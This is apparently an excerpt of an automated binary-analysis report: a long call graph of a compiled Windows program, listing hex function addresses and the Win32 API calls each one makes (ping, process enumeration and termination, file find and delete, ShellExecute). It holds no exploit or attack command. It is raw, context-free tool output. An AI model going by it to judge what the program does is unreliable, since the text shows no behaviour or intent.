103279->103550 103283 a66c03 8 API calls 103283->103290 103285 a7bbbe 43 API calls 103285->103290 103287 a7b1fb 103287->103229 103288 a6c98d 39 API calls 103288->103290 103289 a68ec0 52 API calls 103289->103290 103290->103283 103290->103285 103290->103287 103290->103288 103290->103289 103291 a68577 8 API calls 103290->103291 103536 a6396b 103290->103536 103546 a63907 103290->103546 103551 a84d98 103290->103551 103561 a67ad5 103290->103561 103566 a6ad40 8 API calls __fread_nolock 103290->103566 103567 a67b1a 8 API calls 103290->103567 103291->103290 103297 aea5c5 103294->103297 103295 a68ec0 52 API calls 103296 aea632 103295->103296 103652 ad18a9 103296->103652 103297->103295 103299 aea5d4 103297->103299 103299->103229 103301 aeaa08 103300->103301 103307 aea9c8 103300->103307 103302 aeaa26 103301->103302 103728 a6c98d 39 API calls 103301->103728 103305 aeaa8e 103302->103305 103302->103307 103729 a6c98d 39 API calls 103302->103729 103696 ad0372 103305->103696 103307->103229 103309 a8017b 8 API calls 103308->103309 103310 adf95b 103309->103310 103757 a6423c 103310->103757 103313 a68ec0 52 API calls 103314 adf97c GetEnvironmentVariableW 103313->103314 103760 ad160f 8 API calls 103314->103760 103316 adf999 ISource 103316->103229 103318 a68ec0 52 API calls 103317->103318 103319 ad6662 103318->103319 103761 acdc54 103319->103761 103321 ad666a 103322 ad666e GetLastError 103321->103322 103323 ad6683 103321->103323 103322->103323 103323->103229 103325 ae89b6 119 API calls 103324->103325 103326 ae9ff8 103325->103326 103326->103229 103328 ae0fe1 103327->103328 103329 ae100f WSAStartup 103328->103329 103865 a6c98d 39 API calls 103328->103865 103331 ae1054 103329->103331 103341 ae1023 ISource 103329->103341 103852 a7c1f6 103331->103852 103333 ae0ffc 103333->103329 103866 a6c98d 39 API calls 103333->103866 103335 a68ec0 52 API calls 103337 ae1069 103335->103337 103857 a7f9d4 WideCharToMultiByte 103337->103857 103338 ae100b 103338->103329 103340 ae1075 inet_addr gethostbyname 103340->103341 103342 ae1093 IcmpCreateFile 103340->103342 103341->103229 103342->103341 103343 ae10d3 103342->103343 103344 a8017b 8 API calls 103343->103344 103345 ae10ec 103344->103345 103346 a6423c 8 API calls 103345->103346 103347 ae10f7 103346->103347 103348 ae112b IcmpSendEcho 103347->103348 103349 ae1102 IcmpSendEcho 103347->103349 103350 ae114c 103348->103350 103349->103350 103351 ae1212 IcmpCloseHandle WSACleanup 103350->103351 103351->103341 103353 a68ec0 52 API calls 103352->103353 103354 aead63 103353->103354 103869 acdd87 CreateToolhelp32Snapshot Process32FirstW 103354->103869 103356 aead72 103356->103229 103358 ae7b38 103357->103358 103359 ae7b52 103357->103359 103888 ad3fe1 81 API calls __wsopen_s 103358->103888 103361 ae60e6 8 API calls 103359->103361 103362 ae7b5d 103361->103362 103363 a70340 206 API calls 103362->103363 103364 ae7bc1 103363->103364 103365 ae7b4a 103364->103365 103366 ae7c5c 103364->103366 103367 ae7c03 103364->103367 103365->103193 103368 ae7cb0 103366->103368 103370 ae7c62 103366->103370 103374 ad148b 8 API calls 103367->103374 103368->103365 103369 a68ec0 52 API calls 103368->103369 103371 ae7cc2 103369->103371 103889 ad1ad8 8 API calls 103370->103889 103375 a6c2c9 8 API calls 103371->103375 103373 ae7c85 103890 a6bd07 8 API calls 103373->103890 103377 ae7c3b 103374->103377 103378 ae7ce6 CharUpperBuffW 103375->103378 103379 a72b20 206 API calls 103377->103379 103380 ae7d00 103378->103380 103379->103365 103381 ae7d07 103380->103381 103382 ae7d53 103380->103382 103385 ad148b 8 API calls 103381->103385 103383 a68ec0 52 API calls 103382->103383 103384 ae7d5b 103383->103384 103891 a7aa65 9 API calls 103384->103891 103387 ae7d35 103385->103387 103388 a72b20 206 API calls 103387->103388 103388->103365 103389 ae7d65 103389->103365 103390 a68ec0 52 API calls 103389->103390 103391 ae7d80 103390->103391 103892 a6bd07 8 API calls 103391->103892 103393->103230 103394->103191 103396 a6b338 _wcslen 103395->103396 103397 a8017b 8 API calls 103396->103397 103398 a6b360 __fread_nolock 103397->103398 103399 a8014b 8 API calls 103398->103399 103400 a6b376 103399->103400 103400->103204 103401->103199 103402->103203 103403->103217 103404->103217 103405->103229 103406->103229 103407->103229 103408->103227 103409->103229 103411 a68ec0 52 API calls 103410->103411 103412 ae89ed 103411->103412 103437 ae8a32 ISource 103412->103437 103448 ae9730 103412->103448 103414 ae8cde 103415 ae8eac 103414->103415 103419 ae8cec 103414->103419 103498 ae9941 59 API calls 103415->103498 103418 ae8ebb 103418->103419 103420 ae8ec7 103418->103420 103461 ae88e3 103419->103461 103420->103437 103421 a68ec0 52 API calls 103439 ae8aa6 103421->103439 103426 ae8d25 103475 a7ffe0 103426->103475 103429 ae8d5f 103483 a67e12 103429->103483 103430 ae8d45 103482 ad3fe1 81 API calls __wsopen_s 103430->103482 103433 ae8d50 GetCurrentProcess TerminateProcess 103433->103429 103437->103274 103439->103414 103439->103421 103439->103437 103480 ac4ad3 8 API calls __fread_nolock 103439->103480 103481 ae8f7a 41 API calls _strftime 103439->103481 103440 ae8f22 103440->103437 103442 ae8f36 FreeLibrary 103440->103442 103441 ae8d9e 103495 ae95d8 74 API calls 103441->103495 103442->103437 103447 ae8daf 103447->103440 103496 a71ca0 8 API calls 103447->103496 103497 a6b4c8 8 API calls 103447->103497 103499 ae95d8 74 API calls 103447->103499 103449 a6c2c9 8 API calls 103448->103449 103450 ae974b CharLowerBuffW 103449->103450 103500 ac9805 103450->103500 103454 a6bf73 8 API calls 103455 ae9787 103454->103455 103507 a6acc0 103455->103507 103457 ae979b 103458 a6adf4 8 API calls 103457->103458 103460 ae97a5 _wcslen 103458->103460 103459 ae98bb _wcslen 103459->103439 103460->103459 103519 ae8f7a 41 API calls _strftime 103460->103519 103462 ae88fe 103461->103462 103466 ae8949 103461->103466 103463 a8017b 8 API calls 103462->103463 103464 ae8920 103463->103464 103465 a8014b 8 API calls 103464->103465 103464->103466 103465->103464 103467 ae9af3 103466->103467 103468 ae9d08 ISource 103467->103468 103473 ae9b17 _strcat _wcslen ___std_exception_copy 103467->103473 103468->103426 103469 a6c63f 39 API calls 103469->103473 103470 a6c98d 39 API calls 103470->103473 103471 a6ca5b 39 API calls 103471->103473 103472 a68ec0 52 API calls 103472->103473 103473->103468 103473->103469 103473->103470 103473->103471 103473->103472 103523 acf8c5 10 API calls _wcslen 103473->103523 103476 a7fff5 103475->103476 103477 a8008d CreateToolhelp32Snapshot 103476->103477 103478 a8007b CloseHandle 103476->103478 103479 a8005b 103476->103479 103477->103479 103478->103479 103479->103429 103479->103430 103480->103439 103481->103439 103482->103433 103484 a67e1a 103483->103484 103485 a8014b 8 API calls 103484->103485 103486 a67e28 103485->103486 103524 a68445 103486->103524 103489 a68470 103527 a6c760 103489->103527 103491 a68480 103492 a8017b 8 API calls 103491->103492 103493 a6851c 103491->103493 103492->103493 103493->103447 103494 a71ca0 8 API calls 103493->103494 103494->103441 103495->103447 103496->103447 103497->103447 103498->103418 103499->103447 103501 ac9825 _wcslen 103500->103501 103502 ac9914 103501->103502 103504 ac985a 103501->103504 103506 ac9919 103501->103506 103502->103454 103502->103460 103504->103502 103520 a7e36b 41 API calls 103504->103520 103506->103502 103521 a7e36b 41 API calls 103506->103521 103508 a6accf 103507->103508 103509 a6ace1 103507->103509 103510 a6c2c9 8 API calls 103508->103510 103516 a6acda __fread_nolock 103508->103516 103509->103508 103512 a6ad07 103509->103512 103513 ab0557 103509->103513 103511 ab05a3 __fread_nolock 103510->103511 103522 a688e8 8 API calls 103512->103522 103515 a8014b 8 API calls 103513->103515 103517 ab0561 103515->103517 103516->103457 103518 a8017b 8 API calls 103517->103518 103518->103508 103519->103459 103520->103504 103521->103506 103522->103516 103523->103473 103525 a8014b 8 API calls 103524->103525 103526 a67e30 103525->103526 103526->103489 103528 a6c76b 103527->103528 103529 ab1285 103528->103529 103534 a6c773 ISource 103528->103534 103530 a8014b 8 API calls 103529->103530 103532 ab1291 103530->103532 103531 a6c77a 103531->103491 103534->103531 103535 a6c7e0 8 API calls ISource 103534->103535 103535->103534 103537 a63996 ___scrt_fastfail 103536->103537 103568 a65f32 103537->103568 103541 aa40cd Shell_NotifyIconW 103542 a63a3a Shell_NotifyIconW 103572 a661a9 103542->103572 103543 a63a1c 103543->103541 103543->103542 103545 a63a50 103545->103290 103547 a63969 103546->103547 103548 a63919 ___scrt_fastfail 103546->103548 103547->103290 103549 a63938 Shell_NotifyIconW 103548->103549 103549->103547 103550->103290 103552 a84e1b 103551->103552 103553 a84da6 103551->103553 103651 a84e2d 40 API calls 4 library calls 103552->103651 103560 a84dcb 103553->103560 103649 a8f649 20 API calls _abort 103553->103649 103556 a84e28 103556->103290 103557 a84db2 103650 a92b5c 26 API calls __wsopen_s 103557->103650 103559 a84dbd 103559->103290 103560->103290 103562 a8017b 8 API calls 103561->103562 103563 a67afa 103562->103563 103564 a8014b 8 API calls 103563->103564 103565 a67b08 103564->103565 103565->103290 103566->103290 103567->103290 103569 a639eb 103568->103569 103570 a65f4e 103568->103570 103569->103543 103602 acd11f 42 API calls _strftime 103569->103602 103570->103569 103571 aa5070 DestroyIcon 103570->103571 103571->103569 103573 a661c6 103572->103573 103592 a662a8 103572->103592 103574 a67ad5 8 API calls 103573->103574 103575 a661d4 103574->103575 103576 aa5278 LoadStringW 103575->103576 103577 a661e1 103575->103577 103580 aa5292 103576->103580 103578 a68577 8 API calls 103577->103578 103579 a661f6 103578->103579 103581 aa52ae 103579->103581 103582 a66203 103579->103582 103584 a6bed9 8 API calls 103580->103584 103588 a66229 ___scrt_fastfail 103580->103588 103581->103588 103589 aa52f1 103581->103589 103591 a6bf73 8 API calls 103581->103591 103582->103580 103583 a6620d 103582->103583 103603 a66b7c 103583->103603 103584->103588 103590 a6628e Shell_NotifyIconW 103588->103590 103622 a7fe6f 51 API calls 103589->103622 103590->103592 103593 aa52d8 103591->103593 103592->103545 103621 aca350 9 API calls 103593->103621 103596 aa52e3 103598 a67bb5 8 API calls 103596->103598 103597 aa5310 103599 a66b7c 8 API calls 103597->103599 103598->103589 103600 aa5321 103599->103600 103601 a66b7c 8 API calls 103600->103601 103601->103588 103602->103543 103604 aa57fe 103603->103604 103605 a66b93 103603->103605 103606 a8014b 8 API calls 103604->103606 103623 a66ba4 103605->103623 103609 aa5808 _wcslen 103606->103609 103608 a6621b 103612 a67bb5 103608->103612 103610 a8017b 8 API calls 103609->103610 103611 aa5841 __fread_nolock 103610->103611 103613 a67bc7 103612->103613 103614 aa641d 103612->103614 103638 a67bd8 103613->103638 103648 ac13c8 8 API calls __fread_nolock 103614->103648 103617 a67bd3 103617->103588 103618 aa6427 103619 aa6433 103618->103619 103620 a6bed9 8 API calls 103618->103620 103620->103619 103621->103596 103622->103597 103624 a66bb4 _wcslen 103623->103624 103625 a66bc7 103624->103625 103626 aa5860 103624->103626 103633 a67d74 103625->103633 103627 a8014b 8 API calls 103626->103627 103630 aa586a 103627->103630 103629 a66bd4 __fread_nolock 103629->103608 103631 a8017b 8 API calls 103630->103631 103632 aa589a __fread_nolock 103631->103632 103635 a67d8a 103633->103635 103637 a67d85 __fread_nolock 103633->103637 103634 aa6528 103635->103634 103636 a8017b 8 API calls 103635->103636 103636->103637 103637->103629 103639 a67c1b __fread_nolock 103638->103639 103640 a67be7 103638->103640 103639->103617 103640->103639 103641 a67c0e 103640->103641 103642 aa644e 103640->103642 103644 a67d74 8 API calls 103641->103644 103643 a8014b 8 API calls 103642->103643 103645 aa645d 103643->103645 103644->103639 103646 a8017b 8 API calls 103645->103646 103647 aa6491 __fread_nolock 103646->103647 103648->103618 103649->103557 103650->103559 103651->103556 103653 ad18b6 103652->103653 103654 a8014b 8 API calls 103653->103654 103655 ad18bd 103654->103655 103658 acfcb5 103655->103658 103657 ad18f7 103657->103299 103659 a6c2c9 8 API calls 103658->103659 103660 acfcc8 CharLowerBuffW 103659->103660 103661 acfcdb 103660->103661 103662 a6655e 8 API calls 103661->103662 103663 acfd19 103661->103663 103675 acfce5 ___scrt_fastfail 103661->103675 103662->103661 103664 acfd2b 103663->103664 103691 a6655e 103663->103691 103666 a8017b 8 API calls 103664->103666 103669 acfd59 103666->103669 103671 acfd7b 103669->103671 103694 acfbed 8 API calls 103669->103694 103670 acfdb8 103672 a8014b 8 API calls 103670->103672 103670->103675 103676 acfe0c 103671->103676 103673 acfdd2 103672->103673 103674 a8017b 8 API calls 103673->103674 103674->103675 103675->103657 103677 a6bf73 8 API calls 103676->103677 103678 acfe3e 103677->103678 103679 a6bf73 8 API calls 103678->103679 103680 acfe47 103679->103680 103681 a6bf73 8 API calls 103680->103681 103689 acfe50 103681->103689 103682 a68577 8 API calls 103682->103689 103683 ad0114 103683->103670 103684 a6ad40 8 API calls 103684->103689 103685 a866f8 GetStringTypeW 103685->103689 103687 a86641 39 API calls 103687->103689 103688 acfe0c 40 API calls 103688->103689 103689->103682 103689->103683 103689->103684 103689->103685 103689->103687 103689->103688 103690 a6bed9 8 API calls 103689->103690 103695 a86722 GetStringTypeW _strftime 103689->103695 103690->103689 103692 a6c2c9 8 API calls 103691->103692 103693 a66569 103692->103693 103693->103664 103694->103669 103695->103689 103730 ad02aa 103696->103730 103699 ad040b 103702 ad0471 103699->103702 103705 ad041b 103699->103705 103700 ad03f3 103746 ad05e9 56 API calls __fread_nolock 103700->103746 103703 ad0507 103702->103703 103704 ad04a1 103702->103704 103721 ad0399 __fread_nolock 103702->103721 103708 ad05b0 103703->103708 103709 ad0510 103703->103709 103706 ad04a6 103704->103706 103707 ad04d1 103704->103707 103710 ad0453 103705->103710 103747 ad2855 10 API calls 103705->103747 103706->103721 103750 a6ca5b 39 API calls 103706->103750 103707->103721 103751 a6ca5b 39 API calls 103707->103751 103708->103721 103755 a6c63f 39 API calls 103708->103755 103712 ad058d 103709->103712 103713 ad0515 103709->103713 103737 ad1844 103710->103737 103712->103721 103754 a6c63f 39 API calls 103712->103754 103714 ad051b 103713->103714 103715 ad0554 103713->103715 103714->103721 103752 a6c63f 39 API calls 103714->103752 103715->103721 103753 a6c63f 39 API calls 103715->103753 103721->103307 103723 ad0427 103748 ad2855 10 API calls 103723->103748 103726 ad043e __fread_nolock 103749 ad2855 10 API calls 103726->103749 103728->103302 103729->103305 103731 ad02f7 103730->103731 103735 ad02bb 103730->103735 103756 a6c98d 39 API calls 103731->103756 103732 ad02f5 103732->103699 103732->103700 103732->103721 103734 a68ec0 52 API calls 103734->103735 103735->103732 103735->103734 103736 a84d98 _strftime 40 API calls 103735->103736 103736->103735 103738 ad184f 103737->103738 103739 a8014b 8 API calls 103738->103739 103740 ad1856 103739->103740 103741 ad1883 103740->103741 103742 ad1862 103740->103742 103743 a8017b 8 API calls 103741->103743 103744 a8017b 8 API calls 103742->103744 103745 ad186b ___scrt_fastfail 103743->103745 103744->103745 103745->103721 103746->103721 103747->103723 103748->103726 103749->103710 103750->103721 103751->103721 103752->103721 103753->103721 103754->103721 103755->103721 103756->103732 103758 a8014b 8 API calls 103757->103758 103759 a6424e 103758->103759 103759->103313 103760->103316 103762 a6bf73 8 API calls 103761->103762 103763 acdc73 103762->103763 103764 a6bf73 8 API calls 103763->103764 103765 acdc7c 103764->103765 103766 a6bf73 8 API calls 103765->103766 103767 acdc85 103766->103767 103785 a65851 103767->103785 103772 acdcab 103797 a6568e 103772->103797 103773 a66b7c 8 API calls 103773->103772 103775 acdcbf FindFirstFileW 103776 acdd4b FindClose 103775->103776 103779 acdcde 103775->103779 103782 acdd56 103776->103782 103777 acdd26 FindNextFileW 103777->103779 103778 a6bed9 8 API calls 103778->103779 103779->103776 103779->103777 103779->103778 103780 a67bb5 8 API calls 103779->103780 103781 a66b7c 8 API calls 103779->103781 103780->103779 103783 acdd17 DeleteFileW 103781->103783 103782->103321 103783->103777 103784 acdd42 FindClose 103783->103784 103784->103782 103839 aa22d0 103785->103839 103788 a6587d 103790 a68577 8 API calls 103788->103790 103789 a65898 103845 a6bd57 103789->103845 103792 a65889 103790->103792 103841 a655dc 103792->103841 103795 aceab0 GetFileAttributesW 103796 acdc99 103795->103796 103796->103772 103796->103773 103798 a6bf73 8 API calls 103797->103798 103799 a656a4 103798->103799 103800 a6bf73 8 API calls 103799->103800 103801 a656ac 103800->103801 103802 a6bf73 8 API calls 103801->103802 103803 a656b4 103802->103803 103804 a6bf73 8 API calls 103803->103804 103805 a656bc 103804->103805 103806 a656f0 103805->103806 103807 aa4da1 103805->103807 103809 a6acc0 8 API calls 103806->103809 103808 a6bed9 8 API calls 103807->103808 103810 aa4daa 103808->103810 103811 a656fe 103809->103811 103812 a6bd57 8 API calls 103810->103812 103813 a6adf4 8 API calls 103811->103813 103816 a65733 103812->103816 103814 a65708 103813->103814 103814->103816 103817 a6acc0 8 API calls 103814->103817 103815 a65778 103819 a6acc0 8 API calls 103815->103819 103816->103815 103818 a65754 103816->103818 103824 aa4dcc 103816->103824 103820 a65729 103817->103820 103818->103815 103823 a6655e 8 API calls 103818->103823 103821 a65789 103819->103821 103822 a6adf4 8 API calls 103820->103822 103825 a6579f 103821->103825 103829 a6bed9 8 API calls 103821->103829 103822->103816 103827 a65761 103823->103827 103828 a68577 8 API calls 103824->103828 103826 a657b3 103825->103826 103832 a6bed9 8 API calls 103825->103832 103830 a657be 103826->103830 103834 a6bed9 8 API calls 103826->103834 103827->103815 103833 a6acc0 8 API calls 103827->103833 103831 aa4e8c 103828->103831 103829->103825 103835 a6bed9 8 API calls 103830->103835 103837 a657c9 103830->103837 103831->103815 103836 a6655e 8 API calls 103831->103836 103851 a6ad40 8 API calls __fread_nolock 103831->103851 103832->103826 103833->103815 103834->103830 103835->103837 103836->103831 103837->103775 103840 a6585e GetFullPathNameW 103839->103840 103840->103788 103840->103789 103842 a655ea 103841->103842 103843 a6adf4 8 API calls 103842->103843 103844 a655fe 103843->103844 103844->103795 103846 a6bd64 103845->103846 103847 a6bd71 103845->103847 103846->103792 103848 a8014b 8 API calls 103847->103848 103849 a6bd7b 103848->103849 103850 a8017b 8 API calls 103849->103850 103850->103846 103851->103831 103853 a8017b 8 API calls 103852->103853 103854 a7c209 103853->103854 103855 a8014b 8 API calls 103854->103855 103856 a7c215 103855->103856 103856->103335 103858 a7fa35 103857->103858 103859 a7f9fe 103857->103859 103868 a7fe8a 8 API calls 103858->103868 103861 a8017b 8 API calls 103859->103861 103862 a7fa05 WideCharToMultiByte 103861->103862 103867 a7fa3e 8 API calls __fread_nolock 103862->103867 103864 a7fa29 103864->103340 103865->103333 103866->103338 103867->103864 103868->103864 103879 ace80e 103869->103879 103871 acddd4 Process32NextW 103872 acde86 CloseHandle 103871->103872 103876 acddcd 103871->103876 103872->103356 103873 a6bf73 8 API calls 103873->103876 103874 a6b329 8 API calls 103874->103876 103875 a6568e 8 API calls 103875->103876 103876->103871 103876->103872 103876->103873 103876->103874 103876->103875 103877 a67bb5 8 API calls 103876->103877 103885 a7e36b 41 API calls 103876->103885 103877->103876 103880 ace819 103879->103880 103881 ace830 103880->103881 103884 ace836 103880->103884 103886 a86722 GetStringTypeW _strftime 103880->103886 103887 a8666b 39 API calls _strftime 103881->103887 103884->103876 103885->103876 103886->103880 103887->103884 103888->103365 103889->103373 103890->103365 103891->103389 103892->103365 103893->103251 103894->103251 103895->103249 103896->103254 103897->103157 103898->103155 103899->103151 103900->103151 103901->103061 103902 a8076b 103903 a80777 CallCatchBlock 103902->103903 103932 a80221 103903->103932 103905 a8077e 103906 a808d1 103905->103906 103909 a807a8 103905->103909 103970 a80baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 103906->103970 103908 a808d8 103971 a851c2 28 API calls _abort 103908->103971 103911 a807e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 103909->103911 103943 a927ed 103909->103943 103919 a80848 103911->103919 103966 a8518a 38 API calls 2 library calls 103911->103966 103912 a808de 103972 a85174 28 API calls _abort 103912->103972 103916 a808e6 103917 a807c7 103951 a80cc9 103919->103951 103921 a8084e 103955 a6331b 103921->103955 103926 a8086a 103926->103908 103927 a8086e 103926->103927 103928 a80877 103927->103928 103968 a85165 28 API calls _abort 103927->103968 103969 a803b0 13 API calls 2 library calls 103928->103969 103931 a8087f 103931->103917 103933 a8022a 103932->103933 103973 a80a08 IsProcessorFeaturePresent 103933->103973 103935 a80236 103974 a83004 10 API calls 3 library calls 103935->103974 103937 a8023b 103942 a8023f 103937->103942 103975 a92687 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103937->103975 103939 a80248 103940 a80256 103939->103940 103976 a8302d 8 API calls 3 library calls 103939->103976 103940->103905 103942->103905 103944 a92804 103943->103944 103977 a80dfc 103944->103977 103946 a807c1 103946->103917 103947 a92791 103946->103947 103948 a927c0 103947->103948 103949 a80dfc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 103948->103949 103950 a927e9 103949->103950 103950->103911 103985 a826b0 103951->103985 103954 a80cef 103954->103921 103956 a63382 103955->103956 103957 a63327 IsThemeActive 103955->103957 103967 a80d02 GetModuleHandleW 103956->103967 103987 a852b3 103957->103987 103959 a63352 103993 a85319 103959->103993 103961 a63359 104000 a632e6 SystemParametersInfoW SystemParametersInfoW 103961->104000 103963 a63360 104001 a6338b 103963->104001 103965 a63368 SystemParametersInfoW 103965->103956 103966->103919 103967->103926 103968->103928 103969->103931 103970->103908 103971->103912 103972->103916 103973->103935 103974->103937 103975->103939 103976->103942 103978 a80e05 103977->103978 103979 a80e07 IsProcessorFeaturePresent 103977->103979 103978->103946 103981 a80fce 103979->103981 103984 a80f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103981->103984 103983 a810b1 103983->103946 103984->103983 103986 a80cdc GetStartupInfoW 103985->103986 103986->103954 103988 a852bf CallCatchBlock 103987->103988 104050 a932d1 EnterCriticalSection 103988->104050 103990 a852ca pre_c_initialization 104051 a8530a 103990->104051 103992 a852ff __wsopen_s 103992->103959 103994 a8533f 103993->103994 103995 a85325 103993->103995 103994->103961 103995->103994 104055 a8f649 20 API calls _abort 103995->104055 103997 a8532f 104056 a92b5c 26 API calls __wsopen_s 103997->104056 103999 a8533a 103999->103961 104000->103963 104002 a6339b __wsopen_s 104001->104002 104003 a6bf73 8 API calls 104002->104003 104004 a633a7 GetCurrentDirectoryW 104003->104004 104057 a64fd9 104004->104057 104006 a633ce IsDebuggerPresent 104007 aa3ca3 MessageBoxA 104006->104007 104008 a633dc 104006->104008 104009 aa3cbb 104007->104009 104008->104009 104010 a633f0 104008->104010 104161 a64176 8 API calls 104009->104161 104125 a63a95 104010->104125 104017 a63462 104019 aa3cec SetCurrentDirectoryW 104017->104019 104020 a6346a 104017->104020 104019->104020 104021 a63475 104020->104021 104162 ac1fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 104020->104162 104157 a634d3 7 API calls 104021->104157 104024 aa3d07 104024->104021 104027 aa3d19 104024->104027 104163 a65594 104027->104163 104028 a6347f 104030 a6396b 60 API calls 104028->104030 104035 a63494 104028->104035 104030->104035 104031 aa3d22 104032 a6b329 8 API calls 104031->104032 104033 aa3d30 104032->104033 104036 aa3d38 104033->104036 104037 aa3d5f 104033->104037 104034 a634af 104041 a634b6 SetCurrentDirectoryW 104034->104041 104035->104034 104038 a63907 Shell_NotifyIconW 104035->104038 104039 a66b7c 8 API calls 104036->104039 104040 a66b7c 8 API calls 104037->104040 104038->104034 104042 aa3d43 104039->104042 104049 aa3d5b GetForegroundWindow ShellExecuteW 104040->104049 104043 a634ca 104041->104043 104044 a67bb5 8 API calls 104042->104044 104043->103965 104046 aa3d51 104044->104046 104048 a66b7c 8 API calls 104046->104048 104047 aa3d90 104047->104034 104048->104049 104049->104047 104050->103990 104054 a93319 LeaveCriticalSection 104051->104054 104053 a85311 104053->103992 104054->104053 104055->103997 104056->103999 104058 a6bf73 8 API calls 104057->104058 104059 a64fef 104058->104059 104170 a663d7 104059->104170 104061 a6500d 104062 a6bd57 8 API calls 104061->104062 104063 a65021 104062->104063 104064 a6bed9 8 API calls 104063->104064 104065 a6502c 104064->104065 104184 a6893c 104065->104184 104068 a6b329 8 API calls 104069 a65045 104068->104069 104070 a6be2d 39 API calls 104069->104070 104071 a65055 104070->104071 104072 a6b329 8 API calls 104071->104072 104073 a6507b 104072->104073 104074 a6be2d 39 API calls 104073->104074 104075 a6508a 104074->104075 104076 a6bf73 8 API calls 104075->104076 104077 a650a8 104076->104077 104187 a651ca 104077->104187 104080 a84d98 _strftime 40 API calls 104081 a650c2 104080->104081 104082 aa4b23 104081->104082 104083 a650cc 104081->104083 104084 a651ca 8 API calls 104082->104084 104085 a84d98 _strftime 40 API calls 104083->104085 104086 aa4b37 104084->104086 104087 a650d7 104085->104087 104090 a651ca 8 API calls 104086->104090 104087->104086 104088 a650e1 104087->104088 104089 a84d98 _strftime 40 API calls 104088->104089 104091 a650ec 104089->104091 104092 aa4b53 104090->104092 104091->104092 104093 a650f6 104091->104093 104095 a65594 10 API calls 104092->104095 104094 a84d98 _strftime 40 API calls 104093->104094 104096 a65101 104094->104096 104097 aa4b76 104095->104097 104098 aa4b9f 104096->104098 104099 a6510b 104096->104099 104100 a651ca 8 API calls 104097->104100 104103 a651ca 8 API calls 104098->104103 104102 a6512e 104099->104102 104105 a6bed9 8 API calls 104099->104105 104101 aa4b82 104100->104101 104104 a6bed9 8 API calls 104101->104104 104107 aa4bda 104102->104107 104111 a67e12 8 API calls 104102->104111 104106 aa4bbd 104103->104106 104108 aa4b90 104104->104108 104109 a65121 104105->104109 104110 a6bed9 8 API calls 104106->104110 104112 a651ca 8 API calls 104108->104112 104113 a651ca 8 API calls 104109->104113 104114 aa4bcb 104110->104114 104115 a6513e 104111->104115 104112->104098 104113->104102 104116 a651ca 8 API calls 104114->104116 104117 a68470 8 API calls 104115->104117 104116->104107 104118 a6514c 104117->104118 104193 a68a60 104118->104193 104120 a6893c 8 API calls 104122 a65167 104120->104122 104121 a68a60 8 API calls 104121->104122 104122->104120 104122->104121 104123 a651ab 104122->104123 104124 a651ca 8 API calls 104122->104124 104123->104006 104124->104122 104126 a63aa2 __wsopen_s 104125->104126 104127 aa40da ___scrt_fastfail 104126->104127 104128 a63abb 104126->104128 104130 aa40f6 GetOpenFileNameW 104127->104130 104129 a65851 9 API calls 104128->104129 104131 a63ac4 104129->104131 104132 aa4145 104130->104132 104212 a63a57 104131->104212 104134 a68577 8 API calls 104132->104134 104136 aa415a 104134->104136 104136->104136 104138 a63ad9 104230 a662d5 104138->104230 104851 a63624 7 API calls 104157->104851 104159 a6347a 104160 a635b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104159->104160 104160->104028 104161->104017 104162->104024 104164 aa22d0 __wsopen_s 104163->104164 104165 a655a1 GetModuleFileNameW 104164->104165 104166 a6b329 8 API calls 104165->104166 104167 a655c7 104166->104167 104168 a65851 9 API calls 104167->104168 104169 a655d1 104168->104169 104169->104031 104171 a663e4 __wsopen_s 104170->104171 104172 a68577 8 API calls 104171->104172 104173 a66416 104171->104173 104172->104173 104174 a6655e 8 API calls 104173->104174 104179 a6644c 104173->104179 104174->104173 104175 a6b329 8 API calls 104176 a66543 104175->104176 104178 a66a7c 8 API calls 104176->104178 104177 a6b329 8 API calls 104177->104179 104180 a6654f 104178->104180 104179->104177 104182 a6651a 104179->104182 104183 a6655e 8 API calls 104179->104183 104204 a66a7c 104179->104204 104180->104061 104182->104175 104182->104180 104183->104179 104185 a8014b 8 API calls 104184->104185 104186 a65038 104185->104186 104186->104068 104188 a651d4 104187->104188 104189 a651f2 104187->104189 104191 a6bed9 8 API calls 104188->104191 104192 a650b4 104188->104192 104190 a68577 8 API calls 104189->104190 104190->104192 104191->104192 104192->104080 104194 a68a76 104193->104194 104195 aa6737 104194->104195 104201 a68a80 104194->104201 104210 a7b7a2 8 API calls 104195->104210 104196 aa6744 104211 a6b4c8 8 API calls 104196->104211 104199 a68b9b 104199->104122 104200 aa6762 104200->104200 104201->104196 104201->104199 104202 a68b94 104201->104202 104203 a8014b 8 API calls 104202->104203 104203->104199 104205 a66a8b 104204->104205 104209 a66aac __fread_nolock 104204->104209 104207 a8017b 8 API calls 104205->104207 104206 a8014b 8 API calls 104208 a66abf 104206->104208 104207->104209 104208->104179 104209->104206 104210->104196 104211->104200 104213 aa22d0 __wsopen_s 104212->104213 104214 a63a64 GetLongPathNameW 104213->104214 104215 a68577 8 API calls 104214->104215 104216 a63a8c 104215->104216 104217 a653f2 104216->104217 104218 a6bf73 8 API calls 104217->104218 104219 a65404 104218->104219 104220 a65851 9 API calls 104219->104220 104221 a6540f 104220->104221 104222 aa4d5b 104221->104222 104223 a6541a 104221->104223 104227 aa4d7d 104222->104227 104266 a7e36b 41 API calls 104222->104266 104225 a66a7c 8 API calls 104223->104225 104226 a65426 104225->104226 104260 a61340 104226->104260 104229 a65439 104229->104138 104267 a66679 104230->104267 104233 aa5336 104392 ad36b8 104233->104392 104234 a66679 93 API calls 104236 a6630e 104234->104236 104236->104233 104238 a66316 104236->104238 104242 a66322 104238->104242 104243 aa5353 104238->104243 104240 aa5368 104241 a8017b 8 API calls 104240->104241 104252 aa53ad 104241->104252 104289 a63b39 104242->104289 104437 ace30e 82 API calls 104243->104437 104248 aa5361 104248->104240 104261 a61352 104260->104261 104265 a61371 __fread_nolock 104260->104265 104264 a8017b 8 API calls 104261->104264 104262 a8014b 8 API calls 104263 a61388 104262->104263 104263->104229 104264->104265 104265->104262 104266->104222 104441 a6663e LoadLibraryA 104267->104441 104272 aa5648 104275 a666e7 68 API calls 104272->104275 104273 a666a4 